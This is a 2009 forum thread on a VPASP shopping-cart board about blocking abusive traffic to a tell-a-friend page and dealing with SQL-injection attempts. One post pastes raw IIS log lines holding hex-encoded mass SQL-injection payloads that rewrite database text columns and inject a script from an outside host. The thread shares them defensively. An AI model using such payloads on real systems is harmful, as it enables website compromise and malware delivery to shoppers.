Author |
Topic |
|
cijeho
Starting Member
13 Posts |
Posted - July 09 2009 : 10:00:39
|
Hi - there is a user from the Philippines that has been hitting one of my tellafriend pages repeatedly for the past couple of hours. Nonstop. Is there a way to block a url from visiting my site? I have 4.5, am waiting for 7.0, and am a bit of a novice. |
Edited by - cijeho on July 09 2009 15:01:45 |
|
THeVerve
VP-CART New User
117 Posts |
Posted - July 09 2009 : 10:50:37
|
Do you know the IP address ofthe spammer ? If you do, you can try adding this modification to your shoptellafriend.asp
Open up shoptellafriend.asp using text editor and add this code. Replace "xxxx" with the Ip address of the spammer.
if request.servervariables("REMOTE_ADDR") = "xxxxxxx" then shoperror "An error has occured. Please restart shopping." end if
Add the code under the code "initializesystem" (around line 37 or so)
The code will not work though if they keep changing their ip address using proxy. Best way for this is probably to disable shoptellafriend.asp temporarily by renaming it to something else. |
|
|
cijeho
Starting Member
13 Posts |
Posted - July 09 2009 : 12:01:17
|
Thank you. I don't have the initializesystem in that file. Sorry. I did change the shoptellafriend.asp name to something else, so they now get a 404. Unfortunately, that hasn't stopped them. Any other ideas? |
|
|
cijeho
Starting Member
13 Posts |
Posted - July 09 2009 : 15:00:39
|
Help! This has been going on for 6 hours straight! |
|
|
support
Administrator
4679 Posts |
Posted - July 09 2009 : 15:06:43
|
Hi there
You may want to post this our helpdesk if you cannot solve it from your end.
https://helpdesk.vpasp.com
Thanks
Cam VPASP Support |
|
|
cijeho
Starting Member
13 Posts |
Posted - July 09 2009 : 15:14:56
|
thanks, Cam, what if I don't know my order ID?? |
|
|
support
Administrator
4679 Posts |
Posted - July 09 2009 : 15:18:13
|
You should be able to see your order number at the bottom of your admin screen.
If it is not there then when you post a ticket add your ftp details in the secure section and our support guys can have a look for you.
When in the helpdesk registering select FREE as your version so you do not have to insert an order number if you cannot locate it.
Thanks Cam
VPASP Support |
|
|
SQLDude
Starting Member
41 Posts |
Posted - November 10 2009 : 02:54:29
|
I put this code in to prevent what looks like a SQL injection attack, if that is what this is. Does anyone know how to determine the identity of the person who owns the IP Address and ...umm give him what ever or report him to the authorities or return the favor to them?
if request.servervariables("REMOTE_ADDR") = "93.158.148.30" then shoperror "An error has occured. Please restart shopping." end if
Yandex/1.01.001+(compatible;+Win16;+I) - 200 0 319 156 453 2009-11-09 12:57:44 W3SVC165 GET /shopexd.asp id=552&bc=no;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D4C45465428434F4E5645525428564152434841522834303030292C5B272B40432B275D292C504154494E444558282727253C7363722527272C434F4E5645525428564152434841522834303030292C5B272B40432B275D29292D312920574845524520504154494E444558282727253C7363722527272C434F4E5645525428564152434841522834303030292C5B272B40432B275D29293E302729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 173.18.135.53 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 46672 1547 2953 2009-11-09 12:57:45 W3SVC165 GET /shopexd.asp id=552&bc=no;DeclArE%20@S%20VArChaR(4000);sEt%20@S=CAst(0x6445636C415245204074207661526348417228323535292C406320766172434861722832353529204465636C417265205461624C455F635572736F5220635552534F5220666F722053656C45637420412E6E414D452C422E4E416D652066724F4D207379736F626A6543547320412C735973436F4C754D6E73204220576865724520412E69643D622E496420614E4420612E58747950453D27752720414E642028422E58745970653D3939204F5220622E58747950453D3335204F7220422E58747950653D323331206F7220622E58747950453D31363729206F50456E205461624C655F635552734F72204665746348206E6578542066724F6D205441426C655F637572736F7220696E546F2040742C4063207768694C6528404046457463485F5374617455733D302920424567696E20657845432827555064615465205B272B40542B275D20536574205B272B40432B275D3D725452694D28634F4E7645527428564172634841722834303030292C5B272B40632B275D29292B634173542830583343373336333732363937303734323037333732363333443638373437343730334132463246373737373737324536413733373036463732373436313643324537323735324637303631363736353245364137333345334332463733363337323639373037343345204153205641724348415228353329292729204665746348206E6558742066526F6D207441624C655F437552734F7220694E746F2040742C406320656E6420636C6F5345207461626C655F437572736F52204465416C6C4F43615445205441626C455F637572736F5220%20as%20varcHAR(4000));exeC(@S);-- 80 - 173.18.135.53 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 46614 1573 703
This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies. |
|
|
devshb
Senior Member
United Kingdom
1904 Posts |
Posted - November 10 2009 : 03:47:22
|
"report him to the authorities"
If you do that, I wish you the best of luck! Whenever I've tried to report hackers (even ones who were in the process of committing massive multi-million dollar credit card fraud and who I knew lots of info about), the authorities didn't want to know. Might be different in other countries, but here in the UK the authorities simply aren't interested in electronic fraud (at least that's what I've found, maybe others have had more luck)
I gave up reporting fraud/hackers in the end; everytime I reported it I was either ignored completely or told that I needed to have official proof of the actual physical theft before they'd even look at it. ie they'd only investigate if the person defrauded reported the crime; they wouldn't even consider situations where you knew what was going on but weren't personally the effected customer.
Simon Barnaby Developer [email protected] www.BigYellowZone.com Web Design, Online Marketing and VPASP addons |
Edited by - devshb on November 10 2009 03:49:49 |
|
|
SQLDude
Starting Member
41 Posts |
Posted - November 11 2009 : 10:08:09
|
The subtle sub-rosa intent was to inform others to search for a User_Agent which contains "Yandex" in order to block all breach attempts from persons with accounts at:
http://www.Yandex.ru
The user_agent setting has the telltale browser setting from that website as an ISP even though the person spoofs random IP addresses. I have some ASP code which does a quick reverse DNS lookup to source the country of origin if they use their correct IP Address. If you never sell into Russia, Iran, Afghanistan or Iraq then you might want to block all IPs from those countries.
I will post the download area for this code in a few hours if anyone is interested. It uses an Access Database.
This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies. |
|
|
SQLDude
Starting Member
41 Posts |
Posted - November 11 2009 : 10:43:29
|
Here is the IP to Country translation URL for testing purposes:
http://designerstyles.biz/ip/ipcountry.asp
This can not only be used to block certain countries which are known hacker havens, but also to provide a first line of defense against possible credit card fraud. If the country where the IP Address originates from does not match the Country on the Credit Card, you can expend additional validation time to convince yourself whether or not the Credit Card is perhaps being used by a credit card fraud expert.
I will add this as a product item on my website later today.
eMail me if you are interested: [email protected]
This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies. |
|
|
janetvelasquez80l
Starting Member
1 Posts |
Posted - November 13 2009 : 10:24:50
|
Have you tried blocking its IP?
[url=http://www.hubschrauber-selber-fliegen.eu]Hubschrauber selber fliegen[/url]
[url=http://www.hubschrauber-selber-fliegen.eu]Hubschrauber selber fliegen[/url] |
|
|
SQLDude
Starting Member
41 Posts |
Posted - November 13 2009 : 14:07:43
|
This hacker using Yandex as the ISP is so sophisticated that he can spoof normal US IP Addresses and change it every time. The one thing he can't change is the embedded reference to "Yandex" in his User Agent settings, so that is what I search for and then block out based on that setting. You have to counter the sophisticated hacker attacks with appropriate counter-measures. Since I can not ship out of the USA without many complex tariff and customs written documentation I may just block out all non-USA IP addresses using the list of 60,000 rules for assigned IP ranges found in my IP to Country conversion routines.
http://designerstyles.biz/ip/ipcountry.asp
I plan to convert this into a mini-product which will sell for $79.00 if anyone is interested.
This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies. |
|
|
highbanks
Starting Member
2 Posts |
Posted - November 23 2009 : 20:19:04
|
back to the original question, i too have see alot of shoptellafriend.asp possible attacks. What is the issue with that file? and is it fixed in ver 6.5. I am doing an upgrade now. |
|
|
highbanks
Starting Member
2 Posts |
Posted - November 23 2009 : 20:20:16
|
oh, forgot.. does 6.5 have the ability to block certain countries? |
|
|
SQLDude
Starting Member
41 Posts |
Posted - November 23 2009 : 20:39:51
|
All better now. Cam and company added a Captcha feature which makes it impossible for a remote robot submission to succeed. You have to view and enter a 100% match to the 5-10 jumbled and obfuscated characters before doing a submit. And they also added a clearchars feature which strips out most if not all of the SQL injection attacks like the one I posted above.
The more I have to dig into the original source code for the enhancements I did for both the Google Checkout processing and for Bing Cash Back processing written mostly by Howard Kadetz and then modified by Cam and Company, the more impressed I am with what they have accomplished. My hat is off to you, Howard and Cam. Howard you are one of the true pioneers in the field of ASP Shopping Cart software written with a truly generic but very sophisticated approach which allows the SAME CODEBASE to work for Access, MySQL or SQL Server while still accommodating features from Chili Soft to allow systems to run on Linux or Windows. And the number of International Gateways you guys have to support is amazing, just amazing.
I am sure it was a 10-year labor of love for Howard, but at the same time it must have been very, very frustrating to make sure that every line of code would work under each and every combination and permutation of operating systems, database back-ends and gateways.
But enough about Howard and Cam, let's talk about me. I have been told by both Google Checkout management and Bing Cashback personnel that I am the first person they ever heard of who has enabled BOTH integrated systems and all the features in a 100% integrated fashion without dropping a cookie, trashing a session, or missing a byte or losing an order number, an order item or losing a persisted Bing Session Variable even while making multiple round trips to the remote Google hosted servers.
Then when I told them that I did the whole thing with FULL cookie and session integration in less than 18 days flat they were even more impressed. I have purchased several domains like ShopBingCarts.com, Googlized.net and Bingified.com, or whatever, and will be launching marketing campaigns after the holiday selling seasons. Delusions of Grandeur you say? Could be, but it ain't bragging if you can do it.
If you have a domestic USA shopping cart and are interested drop me an email and I can walk you through my web site as soon as it is 100% certified by Bing Cash Back and it is launched. Target date is the first few days in December. Bing also has a pilot for Bing Search Shopping which I hope to be selected for as well.
John, the SQL Dude [email protected]
This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies. |
|
|
|
Topic |
|